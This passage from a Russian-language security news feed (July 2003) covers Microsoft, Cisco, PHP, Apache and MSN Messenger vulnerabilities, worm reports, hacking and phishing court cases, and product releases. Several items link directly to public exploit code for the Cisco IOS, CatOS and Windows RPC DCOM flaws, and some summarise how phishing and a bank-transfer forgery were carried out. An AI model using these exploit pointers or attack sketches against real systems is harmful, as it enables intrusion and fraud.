Server 2000 Desktop Engine, SQL Server 7.0. Все 3 уязвимости - локальные. Первая позволяет подменить сессию именованных каналов (named pipes) пользователя, который пытается обратиться к этой службы и, таким образом, получить контроль над этими самими named pipes от имени пользователя, выполняющего процедуру аутентификации. Вторая - при помощи послыки очень большого пакета именованным каналам вызвать отказ этой службы (DoS в результате переполнения буфера). И, наконец, третья - возможность перезапуска буфера SQL-сервера, позволяющая выполнить произвольный код в системе, либо повысить собственные полномочия в системе. Для устранения всех 3-х уязвимостей выпущены патчи. MS03-029 - http://www.microsoft.com/security/security_bulletins/ms03-029.asp MS03-030 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-030.asp MS03-031 - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-031.asp
23/07/2003 23:30 Нарушение GNU GPL пакета Miranda IM.
Четыре недели назад было обнаружено, что один из мессенджеров под названием ZeeZ IM базировался на коде, целиком украденном из исходного кода другого популёрного мессенджера Miranda IM v0.2. Тем самым была нарушена GNU GPL (лицензия GNU). Мессенджер Zeez IM выпускала и поддерживала российско-австралийская компания QuickRiver Ltd. На настоящий момент распространение ZeeZ приостановлено, однако компания до сих пор не продоставила исходного кода приложения. Подробности - http://miranda-icq.sourceforge.net/zeez-im/
23/07/2003 18:12 Новая версия пакета VMware.
Компания VMware объявила о выпуске новой версии своего пакета VMware ESX Server, предназначенного для создания в рамках одного реального сервера нескольких виртуальных машин, выполняющих независимые друг от друга задачи. Это позволяет оптимизировать нагрузку на существующие вычислительные мощности или заменить несколько устаревших машин одной новой, на которой будут независимо друг от друга выполняться соответствующие задачи. Вторая версия пакета VMware ESX Server содержит целый ряд полезных нововведений. Во-первых, в пакете появилась поддержка блейд-серверов HP ProLiant BL20p и IBM BladeCenter, которые могут разбиваться на независимые виртуальные машины с таким же успехом, что и на более крупных серверах. Нужно отметить и то, что максимальное число виртуальных серверов, которые можно создать в рамках одной физической машины, увеличилось до 80 штук. В VMware ESX Server 2 появилась поддержка файловой системы Advanced File System, стала более совершенной система управления ресурсами, и улучшен интерфейс управления пакетом. Нельзя обойти вниманием и систему Virtual SMP. Она представляет собой надстройку над VMware ESX Server и позволяет выделять виртуальной машине сразу два физических процессора. Такая возможность очень важна при работе с ресурсоемкими приложениями. VMware ESX Server 2 поддерживает множество серверных операционных систем, включая Windows Server 2003, Windows 2000 Server, Windows XP Professional, Windows NT 4, RedHat Advanced Server 2.1, RedHat 7.3, 8.0, 9.0, SuSE Linux Enterprise Server 8 и SuSE Linux 8.2. Пакет VMware является коммерческим. Цена на VMware ESX Server 2 начинается от 3750 долларов США за лицензию на два процессора. Двухпроцессорная лицензия на пакет Virtual SMP стоит 1250 долларов. Источник - http://www.compulenta.ru
23/07/2003 17:33 Microsoft заботится о безопасности ActiveX.
Корпорация Microsoft выпустила два новых руководства для разработчиков. Они посвящены проблемам обеспечения безопасности компонентов ActiveX. Компоненты ActiveX позволяют владельцам веб-сайтов осуществлять запуск программных модулей на клиентских компьютерах. Однако помимо полезных задач, с помощью ActiveX свои задачи могут решать и хакеры. Ситуация усугубляется тем, что многие разработчики допускают в своих компонентах ActiveX схожие ошибки, крайне отрицательно сказывающиеся на безопасности. Чтобы помочь программистам избегать подобных ошибок Microsoft и выпустила два новых онлайновых руководства. В первом из них обсуждаются способы создания безопасных модулей ActiveX, а второй посвящен применению технологии SiteLock, позволяющей повысить безопасность ActiveX. Первое руководство - http://msdn.microsoft.com/workshop/components/activex/security.asp Второе - http://msdn.microsoft.com/downloads/samples/internet/default.asp?url=/downloads/samples/internet/components/SiteLock/default.asp
23/07/2003 17:01 В Интернете установили наблюдательную площадку за вирусами.
По информации, полученной с сайта runet.ru, компания Panda Software запустила онлайновую обсерваторию вирусов. Своеобразный сигнальный пункт должен помочь пользователям избавить свой компьютер от отвратительных сетевых гремлинов. Бесплатный веб-ресурс называется Virus Portal . Здесь серферы найдут полезные советы по защите от вирусов, а также смогут узнать о новых заразах, которые размножаются на просторах Всемирной паутины. В разделе «Infection Map» непрерывно отображается степень воздействие вирусов на каждую страну в мире, а прибор «Panda Virusometer» вычисляет степень риска от атаки той или иной сетевой твари. В секции Downloads пользователи могут проверить хорошо ли работают их анти-вирусные патчи. Отдел Training содержит досье на веб-гремлинов и распространенные мистификации. Virus Portal обновляется каждую минуту 24 часа в день. Веб-сайт мгновенно сообщает, какие вирусы недавно появились, и описывает их особенности и эффект. Президент компании Panda Software Микел Уризарбаррена считает, что защита начинается с изучения угрозы и осведомленность играет важнейшую роль, - сообщает WebUser.Co.Uk. Сайт проекта - http://www.virusportal.com/com
23/07/2003 16:28 Вирусы во второй половине 2003 года: картина предстоящих событий.
Предсказывать, что принесет вторая половина 2003 года в отношении компьютерных вирусов – дело довольно рискованное, но одно можно сказать с полной уверенностью – в ближайшее время обязательно появятся новые вирусы, ни чуть не менее опасные, чем те, с которыми мы имеем дело сейчас. Принимая во внимание события уходящей половины года, можно смело заявлять о том, что в ближайшие месяцы будет наблюдаться стабильный рост вирусной активности, а значит, списки наиболее распространенных вирусов возглавят почтовые черви и черви/трояны. Особой популярностью будут пользоваться вредоносные коды, использующие методы социального инжиниринга (обманывающие пользователей и заставляющие их запускать опасные файлы). Чрезвычайно высокий уровень угрозы представляют черви/трояны, включающие в себя технологии массового распространения червей и вредоносные действия троянов (хищение конфиденциальной информации – паролей, банковских реквизитов, баз данных клиентов и др.). От создателей вирусов можно также ожидать использования “дыр” в наиболее распространенных программах, поскольку данная технология уже «отработана» на многих пользователях. Не будет сюрпризом, например, появление вирусов, подобных Code Red или Slammer, при большом обилии в сети традиционных червей и вредоносных кодов. Помимо названных угроз, пользователи должны остерегаться вирусов, распространяющихся непосредственно в сети Интернет, т.е. не прибегающих к таким средствам распространения, как электронная почта и др. Как показали небезызвестные Muma и Opaserv, вирусы данного типа представляют серьезную опасность. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=181
23/07/2003 16:06 Таиланд получил материалы обвинения по делу хакера Максима Высочанского.
Все документы таиландскому правосудию передала американская сторона. Сам хакер был задержан в Таиланде еще в средине мая. США приняли решение предоставить судебным органам Таиланда материалы обвинения по делу задержанного таиландскими правоохранительными органами в середине мая гражданина Украины Максима Высочанского. Напомним, что хакер был задержан по требованию США, на территории которых Высочанский, предположительно, совершил ряд компьютерных преступлений, передают сервер www.ukranews.com. Были переданы материалы обвинения, на основании которых был выписан ордер на арест Высочанского, - сообщил во вторник, 22 июля, заместитель руководителя пресс-службы МИД Украины Александр Горьков. По его словам, в ближайшее время материалы будут переданы и обвиняемому, и его защите. На сегодня запланирована встреча Максима Высочанского с представителем посольства Украины в Таиланде для обсуждения дальнейших шагов по защите. Источник - http://www.ukranews.com/
23/07/2003 15:23 Red Hat Linux 9.0.93.
Вышла beta версия 9-й версии Red Hat Linux. Из основных новшеств - вкючена поддержка ACPI. Дистрибутив претерпел ряд значительных изменений - например, из него "пропали" LPRng, qt2, kde2-compat, pine и пр., galeon был вытеснен epiphany, появилось много новых пакетов. Подробности - http://rhl.redhat.com/docs/release-notes/
23/07/2003 14:48 Хвастливый хакер отсидит 2 года.
Саймон Валлор из уэльского города Лландадно был признан виновным в нарушении британского закона о противоправном использовании компьютерных технологий (Computer Misuse Act). Он написал вредоносные коды Admirer, Gokar и Redesi. Ни одному из этих вирусов не удалось разделить дурной славы самых распространенных вирусов 2002 года, однако интернет-червь Gokar в начале этого года заразил 27 тыс. компьютеров по всему миру. Сотрудники полиции Северного Уэльса и ФБР нашли Валлора по следам его сообщений в чатах, где он хвастался своими достижениями. Сначала хакер бравировал своими «подвигами», но после вынесения приговора прыти в нем поубавилось, и он обратился к властям с просьбой о смягчении наказания и сокращении тюремного срока. Однако в этом ему было отказано. Судья считает, последствия от действий вирусописателя были слишком разрушительными, и его юный возраст и факт сотрудничества с полицией в ходе следствия едва ли стоит считать смягчающими обстоятельствами. Данное дело можно назвать весьма поучительным для разного рода интернет-хулиганов, которым раньше такие «шалости» сходили с рук. Решение судьи свидетельствует о том, что власти стали строже относиться к преступлениям в интернете, а подросткам пора понять, что если они совершают поступки, аналогичные тому, что сделал Валлор, им придется нести за них наказание. Источник - http://www.securitylab.ru
23/07/2003 14:03 И ещё один эксплоит для уязвимости CISCO.
Похоже, написать эксплоит для новой уязвимости в IOS CISCO cтало хорошей традицией. На этот раз эксплоит выложен на security-protocols.com. Автор - некий badpack3t. Собственно, это даже и не эксплоит, а скрипт для tcsh, предствляющий собой оболочку для запуска довольно "полезной" утилитки hping в сторону уязвимого маршрутизатора. Эксплоит - http://www.security-protocols.com/article.php?sid=1552&mode=thread?der=0
23/07/2003 13:49 Эксплоит уязвимости Windows RPC DCOM.
Выпущен эксплоит уязвимости, которая была обнаружена в компоненте DCOM службы RPC ОС Windosw, построенных на ядре NT (XP, NT, 2K). Наличие уязвимости позволяет выполнить переполнение буфера и, таким образом, выполнить произвольный код в системе с привилегиями Local System. Автор - FlashSky из Xfocus.org. Написан на языке Си для платформы win32. Испытывался на Win2K SP3/4. Эксплоит - http://www.securiteam.com/exploits/5CP0N0KAKK.html
22/07/2003 18:00 Подросток украл у клиентов AOL тысячи долларов.
В США пройдет суд над 17-летним тинэйджером, который использовал спам и фальшивый веб-сайт интернет-гиганта AOL для того, чтобы выманить у пользователей номера их кредиток и украсть со счетов тысячи долларов. Представители Федеральной торговой комиссии решили довести разбирательство против тинэйджера до конца после того, как он согласился вернуть $3500. Юный американец получил пожизненный запрет на рассылку спама. Стоит отметить, что это первый принудительный акт со стороны ФТК против так называемого 'phishing scam' в Интернете. Данный термин обозначает использование нежелательных рассылок для заманивания пользователей на поддельный веб-ресурс, на котором требуется указать персональные финансовые сведения. В данном случае, тинэйджер отправлял электронные письма, где сообщалось, что реципиент должен обновить собственную биллинговую информацию, а для этого необходимо связаться с 'AOL Billing Centre'. Ссылка на означенный веб-сайт прилагалась. Однако, безусловно, пользователи попадали на фальшивый ресурс, который содержал логотип компании и линки на реальные веб-страницы интернет-гиганта. На поддельном сайте пользователь должен был ввести номер кредитной карты, девичью фамилию матери, биллинговый адрес, номер социальной страховки, лимит кредита, персональный идентификационный номер, а также логин и пароль для сервисов AOL. Подробности - http://www.runet.ru/news/3487.html
22/07/2003 17:24 Обход "Safe mode" ограничений в PHP 4.3.x.
Уязвимость обнаружена в PHP. Удаленный пользователь может обойти “Safe Mode” ограничения, вызывая внешние файлы в ограниченных каталогах, используя include() и require(). Удаленный пользователь может обойти ограничения Safe mode, когда не определена PHP директива safe_mode_include_dir. Проверки безопасности не срабатывают при попытке доступа к файлам, используя вызовы include() или require(). В результате возможен неавторизованный доступ или обход политики в среде, в которой используется Safe Mode. Уязвимость обнаружена в PHP 4.3-4.3.2. Подробности - http://securitylab.ru/?ID=39076
22/07/2003 17:02 Недельный отчет о вирусах Panda Software.
Выпущен традиционный, еженедельный отчёт компании Panda Software за прошедшую неделю. Помимо уже упомянутого Klys в нём упоминаются ещё 3 червя: Gruel.B, Lohack.B и Mofei.C. Червь Gruel.B распространяется по электронной почте и в программе обмена файлами KaZaA. Важной особенностью червя является его вредоносное действие – он удаляет огромное количество системных файлов, необходимых для нормальной работы Windows. Gruel.B также выполняет следующие операции: открывает панель управления Windows, отключает Панель задач, скрывает содержимое диска C:, выводит на экран монитора сообщения об ошибках и др. Второй червь, - Lohack.B - распространяется по электронной почте, в программе KaZaA и через сетевые диски. Этот вредоносный код использует методы социального инжиниринга, заставляя считать неискушенных пользователей, что зараженное письмо получено из Министерства науки и техники Испании или от международного антивирусного разработчика компании Panda Software. Для своего запуска червь Lohack.B использует уязвимость Exploit/iFrame браузера Internet Explorer 5.01 и 5.5 при открытии зараженного письма в окне предварительного просмотра Outlook. Однако, если установлена соответствующая заплатка, автоматического запуска червя не произойдет. Червь Mofei.С распространяется по электронной почте и на совместно используемых сетевых дисках. Червь одновременно является трояном, открывая злоумышленнику удаленный доступ к компьютеру жертвы. Он позволяет хакеру получить необходимую информацию, сменить пароли пользователя, удалить файлы и каталоги. Когда Mofei.C становится резидентом оперативной памяти, он пытается подключиться к различным веб-страницам через порты 8080 и 1080. Источник - тот же
22/07/2003 16:47 Червь Klys атакует компьютеры через чаты IRC и сетевые диски.
Компания Panda Software предупреждает о появлении нового червя Klys. Klys распространяется по каналам IRC чатов и в совместно используемых сетевых ресурсах. Помимо функций червя, Klys также выполняет роль дроппера, копируя файл, принадлежащий червю Cult, на зараженные компьютеры, и трояна, открывая злоумышленнику доступ к зараженному ПК через IRC порты. При попадании на компьютер, подключенный к сети, Klys удаляет большую часть совместно используемых ресурсов, в результате чего приложения, которым необходимы эти ресурсы, перестают работать. Источник - http://www.viruslab.ru
22/07/2003 16:13 Программа для поиска уязвимых для вирусов мест в локальной сети.
Компания Sophos объявила о выпуске нового компонента своего корпоративного антивирусного пакета. С помощью EM Reporter компания предлагает облегчить администраторам поиск уязвимых для вирусов и троянов мест в локальной сети. EM Reporter накапливает и анализирует информацию о каждом срабатывании антивируса в корпоративной сети. По итогам анализа информации EM Reporter генерирует подробные отчеты, которые сопровождаются графическими схемами, иллюстрирующими наиболее подверженные вирусным атакам сегменты корпоративной информационной инфраструктуры. Источник - http://www.compulenta.ru
22/07/2003 16:04 Microsoft проиграл дело о завышенной цене на ОС Windows 95.
Калифорнийский судья дал на прошлой неделе предварительное одобрение знаменательному соглашению, по которому компания Microsoft должна выплатить $1,1млрд. для улаживания группового иска, утверждающего, что компания требует слишком высокую плату за свое ПО Windows. Согласно иску, Microsoft нарушил антимонопольные законы штата Калифорния, запрашивая как минимум на $40 больше за каждую копию ОС Windows 95 и Windows 98. Теперь пользователи и организации оповещаются о возможности приобретения ваучеров по цене от $5 до $29 для оплаты покупки программных и аппаратных продуктов от практически любого производителя. По словам юристов, решение суда стало крупнейшей когда-либо досягаемого урегулирования по завышенной цене в США и крупнейшей когда-либо досягаемой выплатой по антимонопольному иску в Калифорнии. В течение ближайших двух месяцев, когда судья Пол Алварадо (Рaul Alvarado), как ожидается, одобрит публичную формулировку соглашения, никто не может предъявлять свои претензии. Две трети от невостребованных денег пойдет в фонд калифорнийских государственных школ в виде ПО от Microsoft и наличности. Если не все ваучеры будут востребованы, компании придется выплатить как минимум $367 млн. наличных школам Калифорнии. Источник - http://www.cnews.ru
22/07/2003 15:31 Как с помощью компьютера были украдены 4 миллиона долларов.
Для этой операции автору исполнения понадобилась голова и компьютер. Некто А.Бусыгин до ареста (по понятным причинам мы не называем настоящего имени героя и названия известного украинского банка) был обладателем огромной суммы – почти 4 млн. долларов. Правда, недолго – всего один месяц. Чтобы остаться им навсегда ему не хватило трех дней, чтобы обналичить деньги. Талантливый молодой человек ограбил один из крупнейших украинских банков. По амнистии он вышел из тюрьмы, не досидев двух лет из шести положенных. До ареста Бусыгин работал в банке в отделе внутренних корреспондентских отношений. Это был своего рода перевалочный пункт, переводивший валюту из 26 дирекций банка, с которыми общались клиенты, в другие украинские банки и за рубеж. Несовершенство законодательства и возможности компьютера подбросили идею преступления. "Это была даже не выношенная идея. Это порыв, игра, - рассказывает бывший миллионер. – Я просто увидел, сколько денег можно получить, элементарно подделав банковский документ". Суть операции состояла в следующем. Бусыгин изымал документ с крупным переводом из потока, идущего в его отдел, и вместо него изготавливал копию, направляя деньги на счета своей зарубежной фирмы. Например, из Одесской дирекции банка приходит заявление с просьбой перевести сумму в 100 тыс. долл. фирме «Reebok». Когда такая бумага приходила в отдел внешнеэкономических отношений, Бусыгин ее изымал, а вместо нее клал другую – с просьбой перевести те же 100 тыс. долл., но уже на свою фирму. Такой документ (их приходило по 300-400 в день) набирался на компьютере. Вообще-то заявление составлялось на бумаге. Но в банк оно приходило по электронной почте. В отделе почты заявление распечатывалось, передавалось в отдел внешнеэкономических отношений, там документ обрабатывали, регистрировали и направляли в отдел международных переводов, где уже по межбанковской электронке заявление переводилось за рубеж. "Я выбирал те заявления, - рассказывает Бусыгин, - на которых значились большие суммы". В общей сложности получилось 3 950 000 долларов, которые он перевел в Голландию. Пропажу обнаружили через месяц. Ход безналичных денег проследили, и банк обратился к амстердамским коллегам с заявлением о блокировании денег. Так Бусыгин перестал быть миллионером. Источник - http://www.crime-research.org
22/07/2003 15:21 Ещё 2 эксплоита уязвимости CISCO.
Ранее мы описывали уязвимость в ОС маршрутизаторов компании CISCO - IOS. Также ранее приводилась ссылка на эксплоитт этой уязвимости. Появилось ещё 2 эксплоита, один из которых выпущен известным исследователем компьютерной безопасности Michal Zalewski. Второй представлен в архивированном виде - tar.gz. Первый эксплоит - http://downloads.securityfocus.com/vulnerabilities/exploits/mine.c Второй эксплоит - http://www.securityfocus.com/data/vulnerabilities/exploits/cisco-bug-44020.tar.gz
22/07/2003 14:48 "Антивирус Касперского" расширяет возможности межсетевых экранов.
"Лаборатория Касперского" заключила соглашение с известным производителем брандмауэров NetASQ (www.netasq.com), предусматривающее внедрение Антивируса Касперского® в продуктовую линейку межсетевых экранов компании. Это обеспечит создание интегрированного решения Netasq, объединяющего такие наиболее востребованные современными пользователями функции, как антивирусная безопасность, сетевая защита, поддержка технологии VPN, а также защита от несанкционированного доступа в режиме реального времени. Возможность установки опции антивирусной защиты на базе Антивируса Касперского® появится у клиентов NetASQ уже в июле при приобретении продуктов, относящихся к среднему ценовому диапазону продуктовой линейки межсетевых экранов компании. На начальном этапе антивирусная компонента будет устанавливаться на моделях IPS F100 и IPS F500, и будет доступна в качестве дополнительной опции для модели IPS F200 после ее коммерческого выпуска, который планируется на более поздний период этого года. Подробнее - http://www.kaspersky.ru/news.html?id=1314274
22/07/2003 14:15 Евросоюз заставит спаммеров расплатиться за миллиардный ущерб.
Правительство Германии намерено внести на рассмотрение в парламент законопроект, согласно которому расылка спама будет причислена к противоправным деяниям, сообщает AFP со ссылкой на министра по защите прав потребителей Ренату Куэнаст (Renate Kuenast). Кроме того, власти смогут конфисковать прибыль, полученную предприятиями с помощью подобных рассылок. Некоторое время назад Евросоюз также предпринял некоторые шаги для сокращения активности спаммеров. Так, Еврокомиссия обязала всех членов Евросоюза к октябрю принять на территории своих стран меры, ограничивающие свободу действия спаммеров. В заявлении Еврокомиссии сказано, что "деятельность лиц, навязчиво рассылающих рекламную корреспонденцию по электронной почте, достигла таких масштабов, в которых она может нанести вред развитию электронной коммерции и информационного сообщества". В 2002 году из-за спаммерских рассылок экономика Европейского союза потеряла 2,5 миллиона евро. Кроме того, по подсчетам европейских специалистов, через несколько месяцев объем спама составит половину от всего мирового e-mail-трафика. Источник - http://www.lenta.ru
21/07/2003 18:06 Очередной вирус маскируется под обновление для Windows.
Антивирусные компании предупреждают о появлении очередного почтового червя, маскирующегося под обновления для операционной системы Windows. Вирус Symten (W32.HLLW.Symten@mm по классификации Symantec или I-Worm.Symten.b по классификации "Лаборатории Касперского") написан на языке Visual Basic и приходит в электронном письме, якобы отправленном службой техподдержки Microsoft и содержащем обновления для модуля SVCHOST.EXE. Тема письма и имя файла выбираются случайно из большого числа вариантов. При открытии вложенного файла активируется червь, который записывает себя в систмные папки Windows, модифицирует реестр и заражает некоторые файлы. Затем червь рассылает себя по всем адресам электронной почты из книги Outlook. Деструктивных функций червь не выполняет, поэтому Symantec относит его к малоопасным вирусам. Источник - http://www.compulenta.ru
21/07/2003 17:15 Эксплоит уязвимости в Cisco CatOS.
10 июля CISCO был опубликован бюллетень по безопасности, в котором констатировалось наличие уязвимости в коммутаторах этой фирмы моделей Catalyst. В частности, она присутствует в моделях серий Catalyst 4000, Catalyst 5000 и Catalyst 6000 под упралвением Cisco CatOS 5.4 - 7.4. Суть уязвимости заключается в том, что при посылке 8-ми TCP-пакетов со специальным образом выставленными флагами, происходит типичный DoS и коммутатор перестаёт обслуживать установленные TCP-cоединения, к коим относятся, например: HTTP, Telnet, SSH. Для воостановления работоспособности необходима перезагрузка свича. SecuriTeam выпущен рабочий эксплоит, который, по сути, представляет собой представленный собой эксплоит более новой уязвимости в продуктах CISCO и её ОС IOS. Эксплоит - http://www.securiteam.com/exploits/5FP0R00AKI.html
21/07/2003 16:49 Любитель Интернета получил год лишения свободы.
В Перми завершено судебное разбирательство по делу 19-летнего гражданина О.Смирнова, обвинявшегося в краже паролей к доступу в Интернет. Суд признал его виновным и приговорил к одному году лишения свободы условно. Можно считать, что Смирнов довольно легко отделался. Решение Свердловского народного суда Перми могло быть и более суровым. В течение января-апреля 2003 года хакер (если быть более точным - просто воришка), украл пароли нескольких пермских организаций, среди которых и общественная организация "Авторский Дом" - официальный представитель всероссийского фестиваля "Rock-line". Суд решил, что, пользуясь за чужой счет Интернетом, взломщик нанес этим предприятиям ущерб, как моральный, так и материальный. По информации ИА "Новый регион" обвиняемый так и не удосужился принести обворованным организациям свои извинения. Более того, в качестве аргумента в свою защиту Смирнов использовал тот факт, что пароли многих пострадавших находятся почти в свободном доступе. Источник - http://www.runet.ru
21/07/2003 16:04 Можно ли доверять поправкам Microsoft?
На сайте ZDNET опубликована довольно любопытная статья Мюнира Котадиа под заголовком "Можно ли доверять поправкам Microsoft?". Вместо того чтобы тратить время и деньги на установку каждой поправки, выпускаемой Microsoft, эксперты рекомендуют дожидаться выхода сервис-пакетов и усилить правила безопасности. Худшее, что может сделать компания, чтобы выдержать следующую атаку Slammer-подобного вируса, это заниматься обновлением операционных систем и приложений при выходе каждой поправки от Microsoft, говорят эксперты. Лучше устанавливать только сервис-пакеты — после тщательного внутреннего тестирования. Эти рекомендации лишний раз подтверждают, что индустрия не принимает всерьез инициативу Microsoft Trustworthy Computing, призванную улучшить репутацию компании как разработчика надежного ПО. Пьер Ноэль, стратег безопасности секьюрити-компании TruSecure International, считает, что те заказчики, которые в начале этого года выполняли все инструкции Microsoft по установке поправок, остались беззащитными перед вирусом Slammer. Но если бы они устанавливали только сервис-пакеты, игнорируя отдельные патчи и хот-фиксы, они были бы в безопасности. «За 12 месяцев Microsoft выпустила несколько поправок для своего ПО SQL Server. Первые защищали от уязвимости, а последняя — которая вышла за месяц до атаки Slammer — предназначалась для решения другой проблемы, однако сама делала SQL Server уязвимым», — говорит Ноэль. Его мнение разделяет главный аналитик RedMonk Джеймс Говернор: «Это правда. К сожалению, так оно и есть». Подробности -
21/07/2003 15:22 Хакер обокрал клиентов южноафриканского банка.
Крупнейший банк Южноафриканской республики подвергся нападению хакера. Полиция ЮАР на этой неделе сообщила о пяти случаях взлома счетов клиентов банка Absa, контролирующего 35% рынка онлайновых транзакций в этой стране. Число онлайновых клиентов банка составляет около 300 тысяч, сообщает интернет-издание Sunday Times. Как стало известно из сообщения южноафриканских полицейских, хакер использовал троянское программное обеспечение, с помощью которого добывал с компьютеров жертв пароли доступа к онлайновым счетам. Общие потери от действий хакера оцениваются в 320 тысяч рандов (около 41,5 тысяч долларов США). В настоящее время руководство банка Absa возвращает украденные средства пострадавшим клиентам, несмотря на то что кража средств произошла, по сути, по вине вкладчиков. Поймать взломщика онлайновых банковских счетов пока не удалось. Источник - http://www.compulenta.ru
21/07/2003 14:05 Вирус BAT.Wimpey.dr безуспешно пытается удалять файлы.
Компания Symantec предупреждает о появлении нового вируса BAT.Wimpey.dr. Этот вирус разрабатывался, чтобы выполнять ряд деструктивных действий, однако из-за ошибок в коде эти действия выполняются частично. При запуске вирус блокирует клавиатуру и мышь, копирует себя в разные папки в папке Windows и пытается удалить в этих папках файлы .jpg, .bmp, .avi, .mov, .sys, .txt, .dll и .pwd. Однако из-за ошибки в коде вируса эти папки остаются невредимыми. Вирус также открывает лотки приводов CD и DVD и, в конце концов, зацикливается, записывая информацию в файл start.txt в папке Windows. В Symantec новый вирус характеризуют как малоопасный. Подробности - http://securityresponse.symantec.com/avcenter/venc/data/bat.wimpey.dr.html
21/07/2003 13:58 Новая версия PE Tools, v1.5.220.2003
Что нового: + Добавлен плагин для восстановления релоков + В меню Task Viewer-а и PE Sniffer-a добавлен пункт "Explorer..." + Исправлен большой баг в PE Sniffer-е + Добавлено несколько новых сигнатур пакеров + Исправлен баг в Debug Directory + В PE Editor-e исправлен баг отображения значений полей заголовков Качать здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
20/07/2003 18:26 Обработка графики из командной строки.
В статье Michael Still, старшего инженера-программиста из фирмы Tower Software, под названием "Graphics from the command line" приводятся примеры работы с инструментарием ImageMagick при обработке изображений из командной строки - изменение размеров, вращение, использование фильтров и т.д. Подобные операции могут быть очень полезны при необходимости преобразования графических изображений из скриптов Перл, Питон, программ на С, С++, Java. Cтатья - http://www-106.ibm.com/developerworks/linux/library/l-graf/?ca=dgr-lnxw05ImageMagick
20/07/2003 17:20 Выход Apache 1.3.28.
Apache Software Foundation совместно с Apache Server Project сообщает о выходе новой версии популярного Вэб-сервера Apache ветви 1.3.х - 1.3.28. Как написано в анонсе в новой версии устранены уязвимости в части безопасности, а также некоторые обнаруженные баги. Устранены 3 уязвимости, обнаруженные с момента выпуска версии 1.3.27: 1. Устранена некорректная обработка некоторых специальных управляющих символов в подпрограмме ротации лог-файлов, в результате которой могло произойти прекращение регистрации (logging) и завершение работы сервера. Уязвимость представлена в версиях Apache для платформ Win32 и OS/2 (CAN-2003-0460). 2. Сервер может упасть в результате входа в бесконечный цикл при обработке некоторых внутренних перенаправлений и вложенных субзапросов. 3. Была обнаружена утечка информации о файловых дескрипторах, которые передавались дочерним процессам, в частности, CGI-скриптам. Всем администраторам Вэб-серверов настоятельно рекомендуют обновиться до новой версии. Подробности - http://www.apache.org/dist/httpd/Announcement.txt
20/07/2003 15:36 Сенат отверг "шпионский" проект Пентагона.
Сенат США отказался финансировать проект, предполагавший создание электронной системы для сбора всевозможных данных об американцах: от их электронных писем до результатов медицинских обследований и банковских транзакций. Белый дом поддержал проект "Получения информации о террористах", однако правозащитники заявили, что подобная программа нарушит право американцев на частную жизнь и приведет к появлению государства тотального контроля. Судьба программы стоимостью 369 миллионов долларов будет окончательно определена позже, однако, по мнению экспертов, ей не суждено быть реализованной. Идея создания базы данных об американцах принадлежит Джону Пойндекстеру, который был главным героем скандала "Иран-контрас" в середине 1980-х годов. Тогда администрация Рональда Рейгана организовала незаконную продажу оружия Ирану, доходы от которой шли никарагуанским "контрас". Сейчас Пойндекстер работает в институте военных исследований и предлагает создать систему, которая будет отслеживать все электронные "следы" американцев, в том числе электронные письма, медицинские записи, авиабилеты, телефонные разговоры и даже подписку на журналы и газеты. Ее цель - создать мощный механизм, который позволил бы отыскать любые следы деятельности террористов. Пентагон заверял, что частная жизнь граждан не пострадает, и его специалисты будут пользоваться информацией только в случае необходимости. В ответ на решение сената США Белый дом заявил, что оно "не позволит создать важный инструмент для борьбы с терроризмом". Источник - http://www.bbc.co.uk
20/07/2003 15:06 Хакеры попытались парализовать работу маршрутизаторов в США.
Хакеры попытались провести атаку на маршрутизаторы на территории США, сообщает Reuters со ссылкой на специалистов по информационной безопасности из университета Карнеги-Меллона. По словам экспертов в пятницу в Интернете был обнаружен программный код, способный использовать один из изъянов в программном обеспечении маршрутизаторов. Сообщению об обнаружении опасного кода предшествовали заявления компании Cisco Systems Inc., занимающейся разработкой программного обеспечения для маршрутизаторов. Представители Cisco предупредили пользователей о существовании серьезного изъяна в своих разработках. В случае, если злоумышленнику удастся воспользоваться таким изъяном, маршрутизаторы могут оказаться закрытыми, что приведет к существенному снижению скорости интернет-трафика, предупредили разработчики. По сведениям специалистов в сфере информационной безопасности, им удалось зафиксировать некоторое число попыток воспользоваться указанным изъяном, однако ни одна из таких попыток успехом, по-видимому, не увенчалась. Подробности - http://story.news.yahoo.com/news?tmpl=story2&u=/nm/20030718/wr_nm/tech_cisco_attacks_dc&e=1
20/07/2003 14:40 Уязвимость в MSN Messenger.
В появившемся недавно MSN Messenger (см. предыдущую новость) тут же была обнаружена уязвимость. Заключается она в том, что если посылается в адрес "жертвы" так называемая "неполная картинка" ("uncompleted picture") происходит отказ MSN Messenger - DoS. Эта, так называемая "неполная картинка" представляет собой графическое изображение, верхняя часть которого представляет собой нормальное изображение, а нижняя - либо чёрная полоса, либо всякая графическая белиберда - наверняка многие видели подобные примеры, если по каким-то причинам при скачивании страницы графики произошёл сбой соединения. MSN Messenger включает в себя один из сервисов, который позволяет клиентам обмениваться графическими изображениями. При этом, во время передачи изображения от одной стороны другой в маленьком окошке, называемом "viewer box" показывается иконка передаваемого файла. В случае же "неполного файла" происходит отказ функционирования MSN Messenger-а. Microsoft выпущена обновлённая версия - 6.0.0602, доступная с сайта, ссылка на который приведена в предыдущей новости. Автор, Bahaa Naamneh, приводит ссылку, где им собрана подборка подобных "неполных" картинок. DoS происходит в результате переполнения буфера при обработке "неполных" изображений. Подробности - http://www.securityfocus.com/archive/1/329663/2003-07-16/2003-07-22/0
20/07/2003 13:36 Microsoft выпустила шестую версию MSN Messenger.
Компания Microsoft выпустила окончательную версию своего интернет-пейджера - MSN Messenger 6. О ее скором появлении стало известно еще в мае, и уже в течение периода бета-тестирования новый интернет-пейджер скачали около 2 млн. человек. Неофициальные копии бета-версий MSN Messenger 6 появились на множестве сайтов в Сети, и Microsoft даже выпустила специальные предупреждения, в которых пользователям не рекомендовалось иметь дело с "утекшими из Microsoft внутренними бетами". Позже компания выпустила публичную бета-версию нового интернет-пейджера. Главной причиной высокой популярности MSN Messenger 6 стали его богатые мультимедийные возможности. В продуктах лидера рынка интернет-пейджеров - компании AOL Time Warner - такие функции либо отсутствовали, либо находились в зачаточном состоянии. Одной из причин этого послужило решение антимонопольных органов США заставить AOL отказаться от внедрения в интернет-пейджер мультимедийных функций под угрозой запрета объединения с Time Warner. Сейчас в AOL пытаются снять это ограничения. Скачать - http://messenger.msn.com/Download/
19/07/2003 14:44 Oracle продолжает наступление на фронте e-mail.
